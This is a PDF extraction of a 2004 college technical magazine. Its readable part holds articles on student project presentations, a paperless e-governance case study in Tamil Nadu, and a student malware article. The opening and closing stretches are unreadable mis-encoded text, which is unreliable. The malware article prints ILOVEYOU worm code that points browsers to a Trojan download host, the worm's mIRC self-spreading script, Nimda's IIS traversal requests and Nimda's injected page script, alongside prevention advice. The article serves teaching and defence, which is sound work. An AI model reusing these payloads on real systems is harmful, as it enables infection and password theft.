LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 35: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil 